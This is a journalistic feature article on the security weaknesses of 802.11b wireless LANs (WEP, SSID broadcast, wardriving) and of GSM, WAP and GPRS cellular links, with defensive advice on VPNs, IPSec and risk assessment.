Ever since the Institute of Electrical and Electronic Engineers (IEEE) launched the 802.11b wireless standard there have been fears about its security. Broadcasting data packets over a 1,500m radius is different from sending them over cables. Security experts are concerned at the disparity between the amount of wireless network activity in the corporate community and the low level of awareness of the vulnerability of radio local area networks (Lans). The problem with broadcasting corporate data over a relatively wide area is that smart people with the right equipment can intercept the signal, says Geoff Davies, managing director of security consultancy I-Sec. At the recent Infosec security conference in London, an I-Sec team demonstrated how a wireless 802.11b network could be hacked using no more than an empty tube of Pringles crisps and a copy of a wireless Lan sniffing service called Netstumbler. "The tube is the correct length for the radio signal, and there is a bit of metal you can fashion that acts as a 2.4GHz radio antenna, providing a signal boost," says Davies, arguing that a do-it-yourself antennae of this sort will cost you less than the equivalent £85 unit bought in the high street. So how can such networks be hacked? The biggest problem lies with inadequate security standards and with poorly configured devices, explains Davies. For a start, most of the wireless base stations sold by suppliers come with the in-built security Wired Equivalent Privacy (Wep) protocol turned off. This means that unless you manually reconfigure your wireless access points, your networks will be broadcasting data that is unencrypted. This problem is not necessarily new; after all, many firewalls also need to be configured before they can be used securely. But then, conventional firewalls are not used to broadcast data across a wide area. Even when you do turn on Wep, there are still problems inherent within it. The problem lies in the protocol's encryption key mechanism, which is implemented in such a way that the key can be recovered by analysing the data flow across the network over a period of time. This has been estimated at between 15 minutes and several days. A response on the popular geek bulletin board Slashdot from Stuart Kerrey, chairman of the Standards Working Group for Wireless Lans at the IEEE 802.11 committee, protested that attacks using this vulnerability would take considerable development resources and computer power. However, this no longer seems to be the case. An open source Wep cracker called requires between five million and 10 million packets to be gathered from a wireless network before cracking the key in less than a second. There is another tool called . Meanwhile work is in hand in the IEEE's 802.11i committee to create a more up-to-date version of the standard. Another problem, says Davies, is that the service set identifier (SSID) - a 32-character unique identifier attached to the header of packets sent over a wireless Lan - is sent as unencrypted text and is vulnerable to being sniffed by third parties. The SSID acts as a network identifier, used to lock out devices that do not know the network ID. Unfortunately, says Davies, most supplier equipment is configured to broadcast the SSID automatically, essentially giving new devices a ticket to join the network. While this is useful for public wireless networks in places such as airports and retail establishments - in the US for example, Starbucks is offering 802.11b access in some of its stores - it represents another security loophole for corporates that do not switch it off. Finding Lans to crack is not a problem for would-be hackers, thanks to the online community. Other programs that can sniff for wireless Lans and their vulnerabilities include Kismet ( ) and Wellenreiter ( ). "Some of these programs can handle a GPS device plugging into them, so that they can log the co-ordinates," says Davies. "Then using programs such as Multimap, someone can put in the longitude and latitude. They can drive around and produce their own maps. This is how we got put on to wireless problems - someone showed me a copy of a map of Brighton." Such maps are easily available on the Internet; the Kansas University's vulnerability mapping project yields a map of Wan/Lan vulnerabilities in downtown Kansas, for example ( ). Running a firewall that broadcasts insecure data to potential snoopers could land you in trouble with the Information Commissioner if that data includes customer information, warns Rupert Battcock, a solicitor at legal firm Nabarro Nathanson. "The Data Protection Act has a requirement that if personal data is being processed, there must be adequate protection in place," says Nathanson. "If an organisation is sending data by wireless means, it could be in breach of the seventh data protection principle which covers access to personal data." Still, wireless Lan technology can be a boon to organisations with many mobile workstations or personal digital assistants, for example. Companies in buildings that are difficult to network will find them useful, as will those that encourage hotdesking among staff. There are some things that you can do to take advantage of wireless Lan technology while minimising your risk. Building remote authentication dial-in user server authentication into your Wan/Lan network structure is a good idea, but this only authenticates users and still leaves your network vulnerable to sniffers with Wep-cracking equipment. The most advisable course of action is to consider Wep to be an insecure mechanism and to run something like IPSec encryption on top of it, effectively creating a virtual private network (VPN) for your users. A VPN will increase the cost of your network, but you can base your decision on whether to implement it by using the same course of action that you should be taking with all other parts of your infrastructure. Map the risks described here against the business data that you will be passing over radio, and assess the financial impact of a breach. If the data is too critical, reassess what should be passed over the network, or use a VPN to bump up your protection. Companies worrying about the security of their wireless Lans should consider the dangers of sending sensitive information over cellular links. While the dangers of interception using GSM are relatively low, although still there, things get considerably more risky using GPRS networks, say pundits. But modern GSM cellular links (over which many Wireless Application Protocol (Wap) data sessions are still carried) are bad enough. Things became considerably better security-wise when the world moved from first-generation analogue cellular links to second-generation digital connections using GSM. At that point, voice communications became digitally encrypted. However, persistent (and rich) hackers can still listen to your staff or customers' conversations thanks to some flaws in cellular network security. Gunter Ollman, manager of X-Force security assessment services at security consultancy Internet Security Systems, says it is possible to spoof a phone using a fake base station due to a lack of base station authentication by the phone. However, the cost of a genuine base station - if a cellular supplier will sell you one - or a fake one is considerable. Another potential security flaw in GSM phones is mainly the fault of lazy Sim (Security Identity Module) card manufacturers. Sim cards are portable cards used within GSM phones to identify a phone to the network. The Comp128 algorithm is used to encrypt the credentials on the card. The encryption mechanism was cracked in 1998 and companies should have stopped using it - but they have not, says Ollie Whitehouse, managing security architect at security consultancy @Stake - primarily because Comp128 is so well-known and cheap to burn on to Sim cards. It is possible to clone such cards using kits that the unscrupulous can buy for less than £100. GSM service providers will be watching for concurrent calls using the same Sim code, which makes card cloning risky, and a newer version of Comp128 (Comp128-2) has been produced, which will make it much harder. Over-the-air decryption is much more difficult because of the encryption technologies used to encode these signals. A team at Berkeley University claims to have done it theoretically, but has not demonstrated it in practice. An online search for passive briefcase-sized GSM monitoring and decryption systems will reveal a couple for sale on the international market. Again, the investment required is considerable, says Alex Blomberg, head of Tandor, a firm specialising in cellular security systems, who says that they are mainly used by government organisations. The bottom line is that an attacker would need to be accessing very sensitive data to make it worth the investment in GSM monitoring or decryption kit. Sim cloning is a more real danger. But, says Whitehouse, the first-generation Wap standard used for mobile data applications represents another risk. Wap uses the Wireless Transport Layer Security (WTLS) protocol to secure data links, but there is a flaw in version 1.0 of the standard. It uses the Unigram Data Protocol (UDP) for sending information between the cellular service provider's network and the phone because it handles narrow bandwidth and unreliable connections more effectively. The conventional Internet Protocol (IP) is used on the internal network. Because of the translation needed between the two protocols, data needs to be decrypted at some point in the network, and this happens on a Wap gateway operated by the cellular provider. The lack of end-to-end encryption makes data vulnerable. One answer to this problem is to run another encryption protocol on top of the existing Wap security protocol using digital keys processed by the phone, but most phones cannot handle the digital key encryption and decryption required in a time acceptable to the user. Fortunately, with the recently approved Wap 2.0, IP is used all the way through the session, which makes end-to-end encryption possible, says Whitehouse. This makes Wap viable from a security standpoint, especially over relatively hard-to-crack GSM links. Unfortunately, just as the application layer becomes more secure, it appears that the transport layer is becoming more vulnerable. For data sessions, many people will be moving from GSM to GPRS, a 2.5G transport. Although Wap 2.0 with its increased security specification runs perfectly well over GPRS, Whitehouse says some implementations of the GPRS specification are less secure than GSM. "@Stake has already broken into GPRS networks from the end of the phone," he says. "GSM was a closed system using band-managed infrastructure. In GPRS you can draw a dotted line from the handset to the sensitive parts of the network." The problem is that while GSM runs on an encrypted, circuit-switched system, the packet-based nature of GPRS makes it look like an IP network all the way from the phone to the inside of the operator's network, and beyond to the content provider's back-end system. And with what result? "The attack platform is the laptop and the GPRS modem," says Whitehouse. "You can use a full suite of penetration tools just as you would on a wireless Lan." Content providers should not rule out GPRS-based services as they are likely to be a lucrative source of revenue over the next five years, as the market matures. But it would be worthwhile getting a demonstrable guarantee that a provider's GPRS network (and particularly the link between its network and yours) has been made secure using standard network protection techniques. Running a penetration test on your own network through the provider's GPRS infrastructure would be an astute move.
Local and wide area network-based radio networks offer convenience, but at a cost - security issues are a key concern for operators. Danny Bradbury explores the problem areas and finds out what can be done to minimise the risks